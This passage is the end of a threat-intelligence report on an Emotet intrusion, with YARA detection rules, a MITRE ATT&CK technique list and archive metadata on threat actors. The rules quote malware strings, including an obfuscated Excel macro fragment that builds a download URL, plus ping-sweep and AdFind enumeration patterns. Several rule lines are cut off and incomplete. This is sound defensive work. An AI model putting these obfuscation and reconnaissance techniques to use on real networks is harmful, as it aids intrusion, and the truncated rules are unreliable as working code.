2022-09-12\r\nIdentifier: Emotet Case 14335\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule llJyMIOvft_14335 {\r\n meta:\r\n description = \"llJyMIOvft.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = 2022-09-12\"\r\n hash1 = \"2b2e00ed89ce6898b9e58168488e72869f8e09f98fecb052143e15e98e5da9df\"\r\n strings:\r\n $s1 = \"Project1.dll\" fullword ascii\r\n $s2 = \"!\u003ev:\\\"6;\" fullword ascii\r\n $s3 = \"y6./XoFz_6fw%r:6*\" fullword ascii\r\n $s4 = \"u3!RuF%OR_O*^$nw7\u0026\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\"\r\n $s5 = \"*/B+ n\" fullword ascii\r\n $s6 = \"ZnwFY66\" fullword ascii\r\n $s7 = \"1!f%G%w\" fullword ascii\r\n $s8 = \"QKMaXCL6\" fullword ascii\r\n $s9 = \"IMaRlh9\" fullword ascii\r\n $s10 = \"_BZRDe'7\u00267\u003c\u003c!{nBLU\" fullword ascii\r\n $s11 = \"lw7\\\"668!qZNL_EIS7IiMa\" fullword ascii\r\n $s12 = \"IS6\\\\JMtdHh0Piw2/PuH\" fullword ascii\r\n $s13 = \"iw#!RuF%OR__*^$nw76668!qZNL_EYS7I\" fullword ascii\r\n $s14 = \".RuF%LR__*^$\" fullword ascii\r\n $s15 = \"^\u003c_EHJ3IPLPeZX0Phg7!BAK%_\" fullword ascii\r\n $s16 = \"ilG8Rn\\\"2OIkY*E%zw'v669(pZGn_EH_6IE\" fullword ascii\r\n $s17 = \"ilg7Rnr0OI^]*JTnw6\\\"76\u003c\" fullword ascii\r\n $s18 = \"Broken pipe\" fullword ascii /* Goodware String - occured 742 times */\r\n $s19 = \"Permission denied\" fullword ascii /* Goodware String - occured 823 times */\r\n $s20 = \"v)(Ro\\\"\u003eOHkU*D%xw9\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 3000KB and\r\n ( pe.imphash() == \"066c972d2129d0e167d371a0abfcf03b\" and ( pe.exports(\"YAeJyEAYL7F4eDck6YUaf\") and pe.ex\r\n}\r\nrule UOmCgbXygCe_14335 {\r\n meta:\r\n description = \"UOmCgbXygCe.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"f4c085ef1ba7e78a17a9185e4d5e06163fe0e39b6b0dc3088b4c1ed11c0d726b\"\r\n strings:\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 19 of 23\n\n$s1 = \"runsuite.log\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"f73.exe\" fullword ascii\r\n $s4 = \"Processing test line %ld %s leaked %d\" fullword ascii\r\n $s5 = \"Internal error: xmlSchemaTypeFixup, complex type '%s': the \u003csimpleContent\u003e\u003crestriction\u003e is missin\r\n $s6 = \"The target namespace of the included/redefined schema '%s' has to be absent or the same as the in\r\n $s7 = \"The target namespace of the included/redefined schema '%s' has to be absent, since the including/\r\n $s8 = \"A \u003csimpleType\u003e is expected among the children of \u003crestriction\u003e, if \u003csimpleContent\u003e is used and th\r\n $s9 = \"there is at least one entity reference in the node-tree currently being validated. Processing of\r\n $s10 = \"## %s test suite for Schemas version %s\" fullword ascii\r\n $s11 = \"Internal error: %s, \" fullword ascii\r\n $s12 = \"If \u003csimpleContent\u003e and \u003crestriction\u003e is used, the base type must be a simple type or a complex t\r\n $s13 = \"For a string to be a valid default, the type definition must be a simple type or a complex type\r\n $s14 = \"For a string to be a valid default, the type definition must be a simple type or a complex type\r\n $s15 = \"Could not open the log file, running in verbose mode\" fullword ascii\r\n $s16 = \"not validating will not read content for PE entity %s\" fullword ascii\r\n $s17 = \"Skipping import of schema located at '%s' for the namespace '%s', since this namespace was alrea\r\n $s18 = \"(annotation?, (simpleContent | complexContent | ((group | all | choice | sequence)?, ((attribute\r\n $s19 = \"get namespace\" fullword ascii\r\n $s20 = \"instance %s fails to parse\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 7000KB and\r\n ( pe.imphash() == \"bcf185f1308ffd9e4249849d206d9d0c\" and pe.exports(\"xmlEscapeFormatString\") or 12 of th\r\n}\r\nrule info_1805_14335 {\r\n meta:\r\n description = \"info_1805.xls\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"e598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e\"\r\n strings:\r\n $s1 = \"32.exe\" fullword ascii\r\n $s2 = \"System32\\\\X\" fullword ascii\r\n $s3 = \"DocumentOwnerPassword\" fullword wide\r\n $s4 = \"DocumentUserPassword\" fullword wide\r\n $s5 = \"t\\\"\u0026\\\"t\\\"\u0026\\\"p\\\"\u0026\\\"s:\\\"\u0026\\\"//lo\\\"\u0026\\\"pe\\\"\u0026\\\"sp\\\"\u0026\\\"ub\\\"\u0026\\\"li\\\"\u0026\\\"ci\\\"\u0026\\\"da\\\"\u0026\\\"de.c\\\"\u0026\\\"o\\\"\u0026\\\"m/cgi-\r\n $s6 = \"UniresDLL\" fullword ascii\r\n $s7 = \"OEOGAJPGJPAG\" fullword ascii\r\n $s8 = \"\\\\Windows\\\\\" fullword ascii\r\n $s9 = \"_-* #,##0.00_-;\\\\-* #,##0.00_-;_-* \\\"-\\\"??_-;_-@_-\" fullword ascii\r\n $s10 = \"_-* #,##0_-;\\\\-* #,##0_-;_-* \\\"-\\\"_-;_-@_-\" fullword ascii\r\n $s11 = \"_-;_-* \\\"\" fullword ascii\r\n $s12 = \"^{)P -z)\" fullword ascii\r\n $s13 = \"ResOption1\" fullword ascii\r\n $s14 = \"DocumentSummaryInformation\" fullword wide /* Goodware String - occured 41 times */\r\n $s15 = \"Root Entry\" fullword wide /* Goodware String - occured 46 times */\r\n $s16 = \"SummaryInformation\" fullword wide /* Goodware String - occured 50 times */\r\n $s17 = \"A\\\",\\\"JJCCBB\\\"\" fullword ascii\r\n $s18 = \"Excel 4.0\" fullword ascii\r\n $s19 = \"Microsoft Print to PDF\" fullword wide\r\n $s20 = \"\\\"_-;\\\\-* #,##0.00\\\\ \\\"\" fullword wide /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0xcfd0 and filesize \u003c 200KB and\r\n all of them\r\n}\r\nrule cobalt_strike_14435_dll_1 {\r\n meta:\r\n description = \"1.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"1b9c9e4ed6dab822b36e3716b1e8f046e92546554dff9bdbd18c822e18ab226b\"\r\n strings:\r\n $s1 = \"curity\u003e\u003crequestedPrivileges\u003e\u003crequestedExecutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/req\r\n $s2 = \"CDNS Project.dll\" fullword ascii\r\n $s3 = \"hemas.microsoft.com/SMI/2005/WindowsSettings\\\"\u003etrue\u003c/dpiAware\u003e\u003c/windowsSettings\u003e\u003c/application\u003e\u003c/a\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 20 of 23\n\n$s4 = \"Hostname to lookup:\" fullword wide\r\n $s5 = \"Hostnames:\" fullword wide\r\n $s6 = \"wOshV- D3\\\"RIcP@DN \\\\\" fullword ascii\r\n $s7 = \"T4jk{zrvG#@KRO* d'z\" fullword ascii\r\n $s8 = \"CDNS Project Version 1.0\" fullword wide\r\n $s9 = \"zK$%S.cPO\u003ertW\" fullword ascii\r\n $s10 = \"vOsh.HSDiXRI\" fullword ascii\r\n $s11 = \"l4p.oZewOsh7zP\" fullword ascii\r\n $s12 = \"5p2o.ewOsh7H\" fullword ascii\r\n $s13 = \"h7H.DiX\" fullword ascii\r\n $s14 = \"l4pWo.ewOsh[H%DiXRI\" fullword ascii\r\n $s15 = \"rEWS).lpp~o\" fullword ascii\r\n $s16 = \",m}_lOG\" fullword ascii\r\n $s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo xmlns=\\\"\r\n $s18 = \"vileges\u003e\u003c/security\u003e\u003c/trustInfo\u003e\u003capplication xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsS\r\n $s19 = \"tn9- 2\" fullword ascii\r\n $s20 = \"PDiXRI7\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 8000KB and\r\n ( pe.imphash() == \"d1aef4e37a548a43a95d44bd2f8c0afc\" or 8 of them )\r\n}\r\nrule cobalt_strike_14435_dll_2 {\r\n meta:\r\n description = \"32.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"76bfb4a73dc0d3f382d3877a83ce62b50828f713744659bb21c30569d368caf8\"\r\n strings:\r\n $x1 = \"mail glide drooping dismiss collation production mm refresh murderer start parade subscription ac\r\n $s2 = \"vlu405yd87.dll\" fullword ascii\r\n $s3 = \"XYVZSWWVU\" fullword ascii /* base64 encoded string 'aVRYeT' */\r\n $s4 = \"ZYWVWSXVT\" fullword ascii /* base64 encoded string 'aeVIuS' */\r\n $s5 = \"WXVZTVVUVX\" fullword ascii /* base64 encoded string 'YuYMUTU' */\r\n $s6 = \"ZYXZXSWZW\" fullword ascii /* base64 encoded string 'avWIfV' */\r\n $s7 = \"SZWVSZTVU\" fullword ascii /* base64 encoded string 'eeRe5T' */\r\n $s8 = \"VXVWUWVZYY\" fullword ascii /* base64 encoded string 'UuVQeYa' */\r\n $s9 = \"VSXZZYSVU\" fullword ascii /* base64 encoded string 'IvYa%T' */\r\n $s10 = \"VXUZUVWVU\" fullword ascii /* base64 encoded string ']FTUeT' */\r\n $s11 = \"SVVZZXZUVW\" fullword ascii /* base64 encoded string 'IUYevTU' */\r\n $s12 = \"USVZVSWVZ\" fullword ascii /* base64 encoded string 'IVUIeY' */\r\n $s13 = \"SWVVTVSVWWXZZVVV\" fullword ascii /* base64 encoded string 'YUSU%VYvYUU' */\r\n $s14 = \"VSXVUXXZS\" fullword ascii /* base64 encoded string 'IuT]vR' */\r\n $s15 = \"WSVZYWZWWW\" fullword ascii /* base64 encoded string 'Y%YafVY' */\r\n $s16 = \"XUSZXXVVW\" fullword ascii /* base64 encoded string 'Q\u0026W]UV' */\r\n $s17 = \"ZWZWZVZWWWZ\" fullword ascii /* base64 encoded string 'efVeVVYf' */\r\n $s18 = \"STZVYVVZYS\" fullword ascii /* base64 encoded string 'I6UaUYa' */\r\n $s19 = \"ZWZWYSZXUZ\" fullword ascii /* base64 encoded string 'efVa\u0026WQ' */\r\n $s20 = \"SVVWWVVVWW\" fullword ascii /* base64 encoded string 'IUVYUUY' */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n ( pe.imphash() == \"4e03b8b675969416fb0d10e8ab11f7c2\" or ( 1 of ($x*) or 12 of them ) )\r\n}\r\nrule find_bat_14335 {\r\nmeta:\r\ndescription = \"Find.bat using AdFind\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\nhash1 = \"5bc00ad792d4ddac7d8568f98a717caff9d5ef389ed355a15b892cc10ab2887b\"\r\nstrings:\r\n$x1 = \"find.exe\" nocase wide ascii\r\n$s1 = \"objectcategory\" nocase wide ascii\r\n$s2 = \"person\" nocase wide ascii\r\n$s3 = \"computer\" nocase wide ascii\r\n$s4 = \"organizationalUnit\" nocase wide ascii\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 21 of 23\n\n$s5 = \"trustdmp\" nocase wide ascii\r\ncondition:\r\nfilesize \u003c 1000\r\nand 1 of ($x*)\r\nand 4 of ($s*)\r\n}\r\nrule adfind_14335 {\r\n meta:\r\n description = \"Find.bat using AdFind\"\r\n author = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\n hash1 = \"b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\"\r\n strings:\r\n $x1 = \"joeware.net\" nocase wide ascii\r\n$s1 = \"xx.cpp\" nocase wide ascii\r\n$s2 = \"xxtype.cpp\" nocase wide ascii\r\n$s3 = \"Joe Richards\" nocase wide ascii\r\n$s4 = \"RFC 2253\" nocase wide ascii\r\n$s5 = \"RFC 2254\" nocase wide ascii\r\n \r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB\r\n and 1 of ($x*)\r\n or 4 of ($s*)\r\n}\r\nrule p_bat_14335 {\r\n meta:\r\n description = \"Finding bat files that is used for enumeration\"\r\n author = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\n strings:\r\n \r\n$a1 = \"for /f %%i in\" nocase wide ascii\r\n$a2 = \"do ping %%i\" nocase wide ascii\r\n$a3 = \"-n 1 \u003e\u003e\" nocase wide ascii\r\n$a4 = \"res.txt\" nocase wide ascii\r\n \r\n condition:\r\n filesize \u003c 2000KB\r\n and all of ($a*)\r\n}\r\nMITRE\r\nDynamic-link Library Injection - T1055.001\r\nComponent Object Model - T1559.001\r\nPowerShell - T1059.001\r\nRegsvr32 - T1218.010\r\nPass the Hash - T1550.002\r\nDomain Groups - T1069.002\r\nDomain Account - T1087.002\r\nDomain Trust Discovery - T1482\r\nMalicious File - T1204.002\r\nSMB/Windows Admin Shares - T1021.002\r\nLateral Tool Transfer - T1570\r\nProcess Injection - T1055\r\nExfiltration to Cloud Storage - T1567.002\r\nThread Execution Hijacking - T1055.003\r\nRemote System Discovery - T1018\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 22 of 23\n\nSystem Information Discovery - T1082\r\nApplication Layer Protocol - T1071\r\nNetwork Share Discovery - T1135\r\nKerberoasting - T1558.003\r\nLSASS Memory - T1003.001\r\nRegistry Run Keys / Startup Folder - T1547.001\r\nPhishing - T1566\r\nSpearphishing Attachment - T1566.001\r\nInternal case #14335\r\nSource: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/" ], "report_names": [ "dead-or-alive-an-emotet-story" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3fad11c6-4336-4b28-a606-f510eca5452e", "created_at": "2022-10-25T16:07:24.346573Z", "updated_at": "2026-04-10T02:00:04.948823Z", "deleted_at": null, "main_name": "Turbine Panda", "aliases": [ "APT 26", "Black Vine", "Bronze Express", "Group 13", "JerseyMikes", "KungFu Kittens", "PinkPanther", "Shell Crew", "Taffeta Typhoon", "Turbine Panda", "WebMasters" ], "source_name": "ETDA:Turbine Panda", "tools": [ "Agent.dhwf", "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "Derusbi", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Hurix", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mivast", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sakula", "Sakula RAT", "Sakurel", "Sogu", "StreamEx", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon", "ffrat" ], "source_id": "ETDA", "reports": null }, { "id": "c5f79f58-db78-4cd7-88cf-c029a2199360", "created_at": "2022-10-25T16:07:23.325227Z", "updated_at": "2026-04-10T02:00:04.542909Z", "deleted_at": null, "main_name": "APT 12", "aliases": [ "APT 12", "BeeBus", "Bronze Globe", "CTG-8223", "Calc Team", "Crimson Iron", "DNSCalc", "DynCALC", "G0005", "Group 22", "Hexagon Typhoon", "Numbered Panda" ], "source_name": "ETDA:APT 12", "tools": [ "AUMLIB", "ETUMBOT", "Exploz", "Graftor", "HIGHTIDE", "IHEATE", "IXESHE", "RIPTIDE", "RapidStealer", "Specfix", "THREEBYTE", "bbsinfo", "mswab", "yayih" ], "source_id": "ETDA", "reports": null }, { "id": "d18fe42c-8407-4f96-aee0-a04e6dce219a", "created_at": "2023-01-06T13:46:38.275292Z", "updated_at": "2026-04-10T02:00:02.907303Z", "deleted_at": null, "main_name": "APT12", "aliases": [ "Group 22", "Calc Team", "DNSCalc", "IXESHE", "Hexagon Typhoon", "BeeBus", "DynCalc", "Crimson Iron", "BRONZE GLOBE", "NUMBERED PANDA", "TG-2754" ], "source_name": "MISPGALAXY:APT12", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "46a151bd-e4c2-46f9-aee9-ee6942b01098", "created_at": "2023-01-06T13:46:38.288168Z", "updated_at": "2026-04-10T02:00:02.911919Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "DEEP PANDA", "Codoso", "KungFu Kittens", "Group 13", "G0009", "G0073", "Checkered Typhoon", "Black Vine", "TEMP.Avengers", "PinkPanther", "Shell Crew", "BRONZE FIRESTONE", "Sunshop Group" ], "source_name": "MISPGALAXY:APT19", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28", "created_at": "2023-01-06T13:46:38.39927Z", "updated_at": "2026-04-10T02:00:02.958273Z", "deleted_at": null, "main_name": "ENERGETIC BEAR", "aliases": [ "BERSERK BEAR", "ALLANITE", "Group 24", "Koala Team", "G0035", "ATK6", "ITG15", "DYMALLOY", "TG-4192", "Crouching Yeti", "Havex", "IRON LIBERTY", "Blue Kraken", "Ghost Blizzard" ], "source_name": "MISPGALAXY:ENERGETIC BEAR", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434033, "ts_updated_at": 1775791970, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.pdf", "text": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.txt", "img": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.jpg" } }